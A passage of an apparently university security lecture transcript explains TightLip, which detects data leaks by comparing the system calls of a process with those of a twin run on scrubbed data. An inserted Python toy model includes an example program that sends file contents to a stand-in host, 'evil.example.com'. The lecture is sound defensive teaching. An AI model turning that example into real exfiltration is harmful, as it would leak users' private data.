1498 01:13:31,180 --> 01:13:34,460 So imagine that-- so the process is executing, 1499 01:13:34,460 --> 01:13:36,900 it tries to access your email file. 1500 01:13:36,900 --> 01:13:39,500 The system spawns this new process, the doppelganger, 1501 01:13:39,500 --> 01:13:42,769 that doppelganger is exactly the same as that original one, 1502 01:13:42,769 --> 01:13:44,810 but it is now reading from the scrubbed data instead 1503 01:13:44,810 --> 01:13:46,122 of the real sensitive data. 1504 01:13:48,760 --> 01:13:51,458 What happens then? 1505 01:13:51,458 --> 01:13:54,963 Essentially, TightLip is going 1506 01:13:54,963 --> 01:14:01,020 to run those two processes in parallel. 1507 01:14:01,020 --> 01:14:05,620 It needs to just watch them and see what they do. 1508 01:14:05,620 --> 01:14:09,842 And so in particular, we're going to see, 1509 01:14:09,842 --> 01:14:21,330 do the processes issue the same system calls 1510 01:14:21,330 --> 01:14:23,708 with the same arguments. 1511 01:14:28,050 --> 01:14:34,795 And if that's the case, then presumably those system calls 1512 01:14:34,795 --> 01:14:38,610 do not depend on the sensitive data. 1513 01:14:38,610 --> 01:14:41,410 So in other words, if I start a process that 1514 01:14:41,410 --> 01:14:43,160 tries to open some sensitive file, 1515 01:14:43,160 --> 01:14:46,390 I feed it basically junk data, I let it execute. 1516 01:14:46,390 --> 01:14:49,860 If that doppelganger process still does the same things 1517 01:14:49,860 --> 01:14:52,021 that the regular process would have done, 1518 01:14:52,021 --> 01:14:53,520 then presumably it wasn't influenced 1519 01:14:53,520 --> 01:14:56,550 by that sensitive data at all. 1520 01:14:56,550 --> 01:15:00,500 So essentially doppelganger will let these processes run, 1521 01:15:00,500 --> 01:15:02,379 TightLip will let these processes run, 1522 01:15:02,379 --> 01:15:03,920 and then check the system calls here.
1523 01:15:03,920 --> 01:15:09,445 And then it might happen that in some case the sys calls diverge. 1524 01:15:13,530 --> 01:15:17,260 So in particular, what if the doppelganger 1525 01:15:17,260 --> 01:15:21,004 starts doing things that the regular version of the process 1526 01:15:21,004 --> 01:15:23,170 would not have done, and then the doppelganger tries 1527 01:15:23,170 --> 01:15:24,800 to make a network call. 1528 01:15:24,800 --> 01:15:27,210 So just like in TaintDroid, when that doppelganger tries 1529 01:15:27,210 --> 01:15:29,577 to make a network call, that's when we say aha, 1530 01:15:29,577 --> 01:15:31,660 we should probably stop what's happening right now 1531 01:15:31,660 --> 01:15:33,660 and then do something. 1532 01:15:33,660 --> 01:15:40,120 So if the system calls diverge, and then the doppelganger 1533 01:15:40,120 --> 01:15:47,540 makes a network call, then we're going to do something. 1534 01:15:47,540 --> 01:15:50,980 So we're going to either raise an alert to the user 1535 01:15:50,980 --> 01:15:52,737 or whatever. 1536 01:15:52,737 --> 01:15:54,670 Kind of like in TaintDroid, but at this point 1537 01:15:54,670 --> 01:15:56,044 there's a specific policy you can 1538 01:15:56,044 --> 01:15:58,520 add in some particular system you're going to use. 1539 01:15:58,520 --> 01:16:00,728 But this is sort of an interesting point at which you 1540 01:16:00,728 --> 01:16:05,140 can say well, somehow that doppelganger process was 1541 01:16:05,140 --> 01:16:07,990 affected by that sensitive data that was returned. 1542 01:16:07,990 --> 01:16:10,390 That means that maybe if the user did not 1543 01:16:10,390 --> 01:16:12,597 think that a particular process was going 1544 01:16:12,597 --> 01:16:14,680 to exfiltrate data, now the user can actually 1545 01:16:14,680 --> 01:16:16,940 do an audit of that program to figure out 1546 01:16:16,940 --> 01:16:20,600 why that program tried to send that data over the network.
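The comparison step can be modeled with two generators that stand in for the original process and its doppelganger. This is a toy model under stated assumptions, not how TightLip hooks the kernel: the `monitor` function, the `NETWORK_CALLS` set, the tuple format for system calls, and the two example programs are all hypothetical. The policy shown raises an alert as soon as the traces have diverged and either copy attempts a network call.

```python
from itertools import zip_longest

# Assumed names for the system calls that count as "going over the network".
NETWORK_CALLS = {"connect", "send"}


def monitor(program, real_data, scrubbed_data):
    """Run `program` on real and scrubbed input in lockstep.

    `program` is a generator function yielding (syscall_name, *args) tuples.
    Returns "alert" if the traces diverge and a network call follows,
    otherwise "ok".
    """
    original = program(real_data)
    doppelganger = program(scrubbed_data)
    diverged = False
    for orig_call, dg_call in zip_longest(original, doppelganger):
        if orig_call != dg_call:
            diverged = True  # some call or argument depended on the data
        if diverged:
            for call in (orig_call, dg_call):
                if call is not None and call[0] in NETWORK_CALLS:
                    return "alert"
    return "ok"


def word_count(data):
    """Example program whose system calls do not depend on the contents."""
    yield ("open", "mail.txt")
    yield ("write", "stdout", len(data))


def exfiltrate(data):
    """Example program that ships the file contents to a remote host."""
    yield ("open", "mail.txt")
    yield ("send", "evil.example.com", data)
```

Given real data and a scrubbed copy of the same length, `monitor(word_count, real, scrubbed)` reports `"ok"` because both traces are identical, while `monitor(exfiltrate, real, scrubbed)` reports `"alert"` because the `send` arguments differ.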
1547 01:16:20,600 --> 01:16:22,104 So does anyone-- go ahead. 1548 01:16:22,104 --> 01:16:23,992 AUDIENCE: So if you're hitting something 1549 01:16:23,992 --> 01:16:26,706 like a Word file or whatever, you kind of 1550 01:16:26,706 --> 01:16:28,229 have to know what you're zeroing out 1551 01:16:28,229 --> 01:16:29,427 and what you're [INAUDIBLE]. 1552 01:16:32,593 --> 01:16:34,217 PROFESSOR: Good question, that's right. 1553 01:16:34,217 --> 01:16:36,133 So I was going to discuss some limitations, 1554 01:16:36,133 --> 01:16:38,008 and one of the limitations is precisely that. 1555 01:16:38,008 --> 01:16:40,874 You need to have per file type scrubbers. 1556 01:16:40,874 --> 01:16:42,746 So you can't just take your email scrubber 1557 01:16:42,746 --> 01:16:44,380 and use it for Word. 1558 01:16:44,380 --> 01:16:47,860 And in fact, if those scrubbers miss something, 1559 01:16:47,860 --> 01:16:50,670 so if they don't redact everything, 1560 01:16:50,670 --> 01:16:53,719 then this system may not catch all the possible sensitive data 1561 01:16:53,719 --> 01:16:54,360 leaks. 1562 01:16:54,360 --> 01:16:55,900 So you're exactly right about that. 1563 01:16:55,900 --> 01:16:57,130 But I think-- go ahead. 1564 01:16:57,130 --> 01:17:00,450 AUDIENCE: So if I understand, why 1565 01:17:00,450 --> 01:17:04,595 should the process look at the data before saying go ahead? 1566 01:17:04,595 --> 01:17:07,000 Why wouldn't you just send the stuff in? 1567 01:17:07,000 --> 01:17:09,240 PROFESSOR: Why would the process-- 1568 01:17:09,240 --> 01:17:12,740 AUDIENCE: If the process plans to input data, [INAUDIBLE]? 1569 01:17:15,410 --> 01:17:17,870 PROFESSOR: Oh, no, no.
1570 01:17:17,870 --> 01:17:20,650 From the perspective of the doppelganger, 1571 01:17:20,650 --> 01:17:22,335 I mean, it may try to, in fact, look 1572 01:17:22,335 --> 01:17:24,747 and see things like does this email address make sense, 1573 01:17:24,747 --> 01:17:26,580 for example, before it tries to send it out. 1574 01:17:26,580 --> 01:17:28,330 But the doppelganger process, it shouldn't 1575 01:17:28,330 --> 01:17:30,740 know that it's gotten this weird scrubbed data. 1576 01:17:30,740 --> 01:17:32,010 So this gets back a little bit to the question 1577 01:17:32,010 --> 01:17:33,134 we were just talking about. 1578 01:17:33,134 --> 01:17:37,620 If your scrubber doesn't scrub things 1579 01:17:37,620 --> 01:17:39,790 in a semantically reasonable way, 1580 01:17:39,790 --> 01:17:42,725 the doppelganger may, in fact, crash, for example. 1581 01:17:42,725 --> 01:17:45,080 It expects things in this sort of format, but it's not. 1582 01:17:45,080 --> 01:17:46,990 But at a high level, the idea is that we're 1583 01:17:46,990 --> 01:17:51,330 trying to trick the doppelganger into doing what it would do 1584 01:17:51,330 --> 01:17:54,690 normally, but on data that's different 1585 01:17:54,690 --> 01:17:57,080 from the original version and see if there 1586 01:17:57,080 --> 01:17:59,120 will be that divergence. 1587 01:17:59,120 --> 01:18:01,440 So one drawback is that, like we're discussing, 1588 01:18:01,440 --> 01:18:04,410 this basically puts the scrubbers in the TCB 1589 01:18:04,410 --> 01:18:06,876 and if they don't work properly, doppelgangers might crash, 1590 01:18:06,876 --> 01:18:09,410 you might not be able to catch some violations, things 1591 01:18:09,410 --> 01:18:10,224 like that. 1592 01:18:10,224 --> 01:18:11,890 But the nice thing about this is that it 1593 01:18:11,890 --> 01:18:14,362 works with legacy systems. 1594 01:18:14,362 --> 01:18:15,820 So we don't have to change anything 1595 01:18:15,820 --> 01:18:17,680 about how the application itself runs.
1596 01:18:17,680 --> 01:18:21,950 We just have to make some fairly minor changes to the OS kernel 1597 01:18:21,950 --> 01:18:25,020 to be able to track the system call stuff, and then 1598 01:18:25,020 --> 01:18:26,420 things sort of work. 1599 01:18:26,420 --> 01:18:27,336 It's very, very nice. 1600 01:18:27,336 --> 01:18:29,210 And the overhead of the system is essentially 1601 01:18:29,210 --> 01:18:31,810 the overhead of running an additional process, which 1602 01:18:31,810 --> 01:18:34,734 is fairly low in a modern operating system. 1603 01:18:34,734 --> 01:18:36,400 This is just sort of a neat way to think 1604 01:18:36,400 --> 01:18:40,970 about how to do some type of limited taint tracking 1605 01:18:40,970 --> 01:18:44,020 without doing heavyweight changes to the runtime 1606 01:18:44,020 --> 01:18:46,165 without requiring changes from the OS-- or sorry, 1607 01:18:46,165 --> 01:18:47,040 from the application. 1608 01:18:47,040 --> 01:18:49,490 AUDIENCE: Are we only doing parallel 1609 01:18:49,490 --> 01:18:51,940 or waiting for each one? 1610 01:18:51,940 --> 01:18:54,125 Are we running both processes and then 1611 01:18:54,125 --> 01:18:55,958 after that we can just check that the system 1612 01:18:55,958 --> 01:18:56,350 calls are the same? 1613 01:18:56,350 --> 01:18:56,840 Like when do we check-- 1614 01:18:56,840 --> 01:18:58,131 PROFESSOR: Yeah, two questions. 1615 01:18:58,131 --> 01:19:03,500 So as long as the doppelganger process does things 1616 01:19:03,500 --> 01:19:06,800 that the OS can control and keep on the local machine, 1617 01:19:06,800 --> 01:19:08,925 you can imagine running the doppelganger process 1618 01:19:08,925 --> 01:19:10,120 and the regular one forward. 1619 01:19:10,120 --> 01:19:14,240 But as soon as the doppelganger tries to affect external state, 1620 01:19:14,240 --> 01:19:16,200 so maybe the network is doing this and that. 
1621 01:19:16,200 --> 01:19:18,722 Maybe you can think of some other leak sources like that. 1622 01:19:18,722 --> 01:19:20,180 Maybe there's something like pipes, 1623 01:19:20,180 --> 01:19:22,471 for example, that the kernel doesn't know how to create 1624 01:19:22,471 --> 01:19:23,670 doppelganger state for. 1625 01:19:23,670 --> 01:19:26,591 At that point you have to stop it and then declare 1626 01:19:26,591 --> 01:19:27,841 success or failure, basically. 1627 01:19:30,930 --> 01:19:33,262 Any other questions? 1628 01:19:33,262 --> 01:19:35,220 All right, well, that's the end of the lecture. 1629 01:19:35,220 --> 01:19:36,261 Have a good Thanksgiving. 1630 01:19:36,261 --> 01:19:38,080 See you next week.